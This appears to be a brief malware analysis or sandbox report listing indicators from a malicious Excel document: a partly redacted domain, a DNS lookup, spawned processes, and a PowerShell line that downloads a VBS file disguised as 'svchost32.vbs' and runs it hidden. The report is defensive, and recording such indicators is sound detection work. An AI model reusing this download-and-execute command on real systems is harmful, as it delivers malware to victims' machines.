Technical Information
- http://on###ivenet.xyz/work/23.vbs as c:\users\public\svchost32.vbs
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{fdf4b0fd-3486-4217-8baf-6ee474be5804}.tmp
- DNS ASK on###ivenet.xyz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (New-Object System.Net.WebClient).DownloadFile('http://on###ivenet.xyz/work/23.vbs','C:\Users\Public\svchost32.vbs');Start-Process 'C:\Users\Public\svchost32.vbs'' (with hidden window)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\svchost32.vbs"
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding